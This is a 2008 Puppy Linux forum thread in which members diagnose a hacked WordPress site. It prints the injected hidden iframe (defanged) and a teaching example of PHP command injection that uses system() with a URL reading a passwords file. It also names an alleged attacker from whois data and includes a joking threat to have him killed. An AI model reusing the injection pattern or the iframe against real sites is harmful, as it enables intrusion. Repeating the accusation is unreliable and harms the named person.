The time now is Mon 18 Feb 2019, 22:47
All times are UTC - 4 |
Page 1 of 9 [121 Posts] |
Goto page: 1, 2, 3, ..., 7, 8, 9 Next |
Author |
Message |
BarryK
Puppy Master

Joined: 09 May 2005 Posts: 8826 Location: Perth, Western Australia
|
Posted: Sat 12 Jan 2008, 18:38 Post subject:
Serious security breach on Developer Blog |
|
I went to my blog this morning and got redirected to another site. My PC became very busy, mouse response extremely slow. I managed to kill SeaMonkey.
I FTP'd to my site and found that two files, blog/index.php and blog/wp-blog-header.php have been modified. I have restored the originals.
The big question is, how could someone do that?
I have raised a ticket with servage and asked them that question.
Note, I've turned off comments on my blog, but there were no suspicious comments anyway.
_________________ http://bkhome.org/news/
|
Back to top
|
|
 |
veronicathecow

Joined: 21 Oct 2006 Posts: 560
|
Posted: Sat 12 Jan 2008, 18:50 Post subject:
|
|
Hi Barry sorry to hear of this problem. My first thought is "Any chance" that your machine has been compromised" Secondly was, perhaps it's time to see if there is need to tighten up Puppy security? (It may have been on the server from their side but it looks as though it was making a good stab at taking over your PC.)
Perhaps now things like the Asus eeePC are getting sold in volume and firfox is becoming more powerful that the forces of darkness will be taking an interest a deeper interest in opensource
Cheers
Tony
|
Back to top
|
|
 |
John Doe
Joined: 01 Aug 2005 Posts: 1689 Location: Michigan, US
|
Posted: Sat 12 Jan 2008, 19:00 Post subject:
|
|
I just PM'd this to Barry, before I noticed the thread here.
You're all welcome to read it.
Regarding the page change:
Wordpress 2.3 Cross Domain Content Insertion- New vulnerability + exploit - xssworm.com
http://seclists.org/fulldisclosure/2007/Nov/0336.html
Regarding the one comment that go through the other day I had signed up to post what follows this link. In the mean time I did some further research and found it was probably SQL injection.
Wordpress 2.3.1 Charset SQL Injection Vulnerability
http://blogsecurity.net/wordpress/wordpress-231-charset-sql-injection-vulnerability/
---
Your security implementation is probably adequate. There are three methods which could be used to create such spam that came to mind when I read your post.
1-an exploit in the WordPress code to bypass the security layers. If you examine your http logs for the request that created the comment it might tell you if this was the method used. Also it would allow you to notify the WordPress creators so they could fix the problem. You could gather, at a minimum, the page that was used to implement the exploit. If a 'get' post was used, you might be able to further identify the query string which would help the coders diagnose the problem faster.
2-a server level database permission issue that allowed another user or site on the same server to insert an entry directly to your database. This would be impractical for spammers, as they would have to pay for accounts on lots of servers and hope a majority or the admins had a weak understanding of security.
3-an sql injection vulnerability in the registration form, the login form or the search form. the login form and search form queries shouldn't use a user that has insert permissions anyway, so maybe the registration form. this would depend on what permissions to which tables the user account that it queried as were given. if that user doesn't have permission to insert to the comment table in the database, it's not this.
|
Back to top
|
|
 |
MU

Joined: 24 Aug 2005 Posts: 13647 Location: Karlsruhe, Germany
|
Posted: Sat 12 Jan 2008, 21:10 Post subject:
|
|
I had a comparable problem not long ago.
Using gftp I could see, that the problem came from a newsletter-module of I think PHPBB.
It seems that a weak point was taken to install a spam-mailer.
You could see it by analyzing how the folders around it got infected by new PHP-Scripts.
One concrete example:
if you have such code:
thecommand = $GET["whatnext"];
system($thecommand);
So you would call a website like this:
http://xyt.com/index.php?whatnext=ls
Then the string "ls" would be passed to index.php
It then is executed by "system".
Now the attack would be to pass your own string, like:
http://xyt.com/index.php?whatnext=ls;cd;cd ..;cd ..;cd etc;cat passwords
You might have to replace some chars with HTML-entities like %20 instead of spaces.
This is a very obvious vulnerability, there are more advanced as said by John Doe.
And software IS buggy.
We had the example of a commercial boardsystem, where you registered as new user with restrictions, and then until you did not log in to your account, had access to all boards, even those that are usually just allowed to be viewed by administrators.
Mark
|
Back to top
|
|
 |
BarryK
Puppy Master

Joined: 09 May 2005 Posts: 8826 Location: Perth, Western Australia
|
Posted: Sat 12 Jan 2008, 22:28 Post subject:
|
|
Looking around my site with gFTP, I quickly discovered that my entire site had been hacked.
This covers goosee.com as well as puppylinux.com, each in it's own subdirectory.
I contacted servage, they replied that I should change my password, and make sure that all directories are 755, and all files 644.
So, I went through, making sure all permissions are okay, uploading the original files when I found a hacked one. But, the thing is, static html pages in 755 directory with 644 permission were also hacked.
I did have a lot of html files with 755, and I did notice a preference by the hacker to hack those. But it doesn't explain how 644 files got hacked. I've sent a message to servage asking how that could happen.
Right now, I'm nervously watching my site to see if anything more happens to it.
There seem to be two different types of hack, one that occurred on Jan 10th, which has injected porno links into some pages. Then the one that I found, a massive hack of my site on Jan 12th, which has inserted redirection code. I'll put the site that I got redirected to, but don't go there!!! Maybe someone can work out what this site does or attempts to do. This is my hacked blog/index.php, but I have inserted some capitalisation to disable it:
Code: | <?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-headerDOTphp');
?><iframe src="httpCOLON//orentraffDOTcn/tdsbear/indexDOTphp?out=1199657524" width="0" height="0" style="display:none"></iframe> |
_________________ http://bkhome.org/news/
|
Back to top
|
|
 |
wingruntled
Joined: 20 Feb 2007 Posts: 287 Location: Great Lakes
|
Posted: Sat 12 Jan 2008, 23:08 Post subject:
|
|
Barry
Not to sound like an idiot, but. This is old news.
You were hacked last year but never got the message.
http://murga-linux.com/puppy/viewtopic.php?t=23724
|
Back to top
|
|
 |
John Doe
Joined: 01 Aug 2005 Posts: 1689 Location: Michigan, US
|
Posted: Sun 13 Jan 2008, 00:29 Post subject:
|
|
I got the name of who is responsible already.
Mahmod AbdAllah el Gashmi
He lives in Turkey. Just say the word Barry and I'll have him killed.
He's mentioned on this page:
http://spamtrackers.eu/wiki/index.php?title=Hijacked_host
I'll post how I figured that out in a bit. I have to go get my nightly brew.
|
Back to top
|
|
 |
Caneri
Joined: 04 Sep 2007 Posts: 1569 Location: Canada
|
Posted: Sun 13 Jan 2008, 01:11 Post subject:
|
|
Well..it looks like puppylinux.ca is also down.
My IP address will not resolve to my domain.
My tech guys are working on this problem but may be until tomorrow before I get an answer.
Sorry all.
Eric
_________________ Be not afraid to grow slowly, only be afraid of standing still.
Chinese Proverb
|
Back to top
|
|
 |
John Doe
Joined: 01 Aug 2005 Posts: 1689 Location: Michigan, US
|
Posted: Sun 13 Jan 2008, 01:33 Post subject:
|
|
Ok, I used wget to request the url Barry posted without using the query string and got a simple file that looks like a login form (it's attached as index.php.txt).
Then I used wget to request the url with the query string and got the following pertinent information (the whole dialog is attached as wget-response.txt):
HTTP request sent, awaiting response... 302 Found
Location: httpCOLON//88.255.94.114/~usersonli/oren/indexDOTphp [following]
Connecting to 88.255.94.114:80... failed: Bad file descriptor.
Using the ip address I looked up the owner via whois.ripe.net. It's that guy I mentioned above (info in whois.ripe.net.txt).
The most interesting part was "Bad file descriptor", that's why your browser froze up. I'm assuming it's some sort of exploit for IE that installs his root kit, which is mentioned at the following post:
http://www.bluetack.co.uk/forums/index.php?showtopic=18139&pid=85109&st=0&#entry85109
What a piece of trash.
 |
Description |
Text Files are in the TarBall
|

Download |
Filename |
files.tar |
Filesize |
8 KB |
Downloaded |
1240 Time(s) |
|
Back to top
|
|
 |
Caneri
Joined: 04 Sep 2007 Posts: 1569 Location: Canada
|
Posted: Sun 13 Jan 2008, 01:54 Post subject:
|
|
I'm not sure if this is related or not.
http://www.internetnews.com/security/article.php/3712071
Eric
_________________ Be not afraid to grow slowly, only be afraid of standing still.
Chinese Proverb
|
Back to top
|
|
 |
John Doe
Joined: 01 Aug 2005 Posts: 1689 Location: Michigan, US
|
Posted: Sun 13 Jan 2008, 02:10 Post subject:
|
|
Caneri wrote: | I'm not sure if this is related or not. |
it's all related somehow
cool read, thanks for the link (hopefully it wasn't one of them )
|
Back to top
|
|
 |
BarryK
Puppy Master

Joined: 09 May 2005 Posts: 8826 Location: Perth, Western Australia
|
Posted: Sun 13 Jan 2008, 02:51 Post subject:
|
|
Okay, if it's an exploit for IE, then likely not targetting Linux and wouldn't have compromised my PC...
Anyway, I think I know how my site was violated. Well, not really 'how', just the basic outline.
My site has had two violations, one dated Jan 10, the second on Jan 12. Well, you might have seen my recent blog post "The spam that got through" - that was Jan 10. Then, last night - Jan 12 - there was another one. That's two of them, corresponding with my site violations.
So, my confidence in WordPress has hit rock bottom. Even if I do upgrade, it seems to be a never ending battle. I've turned off comments - and 'flagman' posted a comment immediately after! Globally turning off comments only affects new posts! Yikes, I hunted through the prefs and there's nothing to globally turn off comments!!!
So, I used the "bad words" filter to block everything - how crude.
_________________ http://bkhome.org/news/
|
Back to top
|
|
 |
Previously known as Guest

Joined: 28 Sep 2005 Posts: 240
|
Posted: Sun 13 Jan 2008, 04:33 Post subject:
|
|
As I've had an ongoing issue with servage & pkagfiles, one of their "fixes" was to move the account to another datacenter & change ALL permissions (directory & file) to 777! Not the brightest bunch it seems.
I've had problems with permissions in the past! 403 errors for no reason.
Also it seems they outsource their tech support to India. I will look further into it & probably relocate pkagfiles to another host.
pkagfiles is currently working, but am watching closely for issues that may arise & will adjust, take offline if needed.
Sorry for any inconveniences.
Ron AKA PkaG.
|
Back to top
|
|
 |
Lobster
Official Crustacean

Joined: 04 May 2005 Posts: 15241 Location: Paradox Realm
|
Posted: Sun 13 Jan 2008, 04:46 Post subject:
|
|
I have a Wordpress blog (rarely post to it)
Had to turn off the comments due to corrective medication for penile dysfunction and porn spam
http://tmxxine.com/wordpress/
corrective medication for penile dysfunction = via***
I can not use the word via*** as Johns efforts to fight the mal merchants changes the word to "poisonous crap"
Look how hard John and Flash work to stop spam
(and it still gets through . . . )
It makes sense for spammers to code bots for popular services
and Wordpress is the top blogging tool.
http://www.honeynet.org/papers/bots/botnet-code.html
We have the word "Puppy" come up with Puppy Linux in Google
Therefore owning that or hijacking it is a commercial decision.
An attack is inconvenient, annoying and also can make one paranoid
(as if it is a personal attack)
It is important to maintain ones psychological perspective
when this sort of situation occurs
(I am occasionally sane enough to recognise that)
So far the solution seems right:
1. Exposing and dealing with the situation
2. Notifying and working with the software and server providers
When the Puppy wiki was attacked with spam bots
rather than change to new software
Raffy hardened the existing software
and even though users have to register
many did and some regular users are making
many useful contributions
Related to spam is the use of gmail to filter
(not ideal but no solution is)
Just remember there is a protective cordon of expertise
around Puppy. How this situation is dealt with is indicative
of a growing maturity. Do we stay in place and fight our corner
or run to a new solution
(with attendant problems)?
Good luck.
_________________ YinYana AI Buddhism
Last edited by Lobster on Tue 05 Feb 2008, 00:45; edited 1 time in total
|
Back to top
|
|
 |
Previously known as Guest

Joined: 28 Sep 2005 Posts: 240
|
Posted: Sun 13 Jan 2008, 05:48 Post subject:
|
|
Previously known as Guest wrote: | As I've had an ongoing issue with servage & pkagfiles, one of their "fixes" was to move the account to another datacenter & change ALL permissions (directory & file) to 777! Not the brightest bunch it seems.
I've had problems with permissions in the past! 403 errors for no reason.
Also it seems they outsource their tech support to India. I will look further into it & probably relocate pkagfiles to another host.
pkagfiles is currently working, but am watching closely for issues that may arise & will adjust, take offline if needed.
Sorry for any inconveniences.
Ron AKA PkaG. |
Interestingly within a few minutes of this post an attack started from:
84.221.65.76 [host-84-221-65-76.cust-adsl.tiscali.it]
80.186.120.215 [a80-186-120-215.elisa-laajakaista.fi]
Maybe I'll start posting fscking IP's involved again! I could write a novel of IP addresses.
|
Back to top
|
|
 |
|
Page 1 of 9 [121 Posts] |
Goto page: 1, 2, 3, ..., 7, 8, 9 Next |
|
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum You cannot attach files in this forum You can download files in this forum
|
Powered by phpBB © 2001, 2005 phpBB Group
|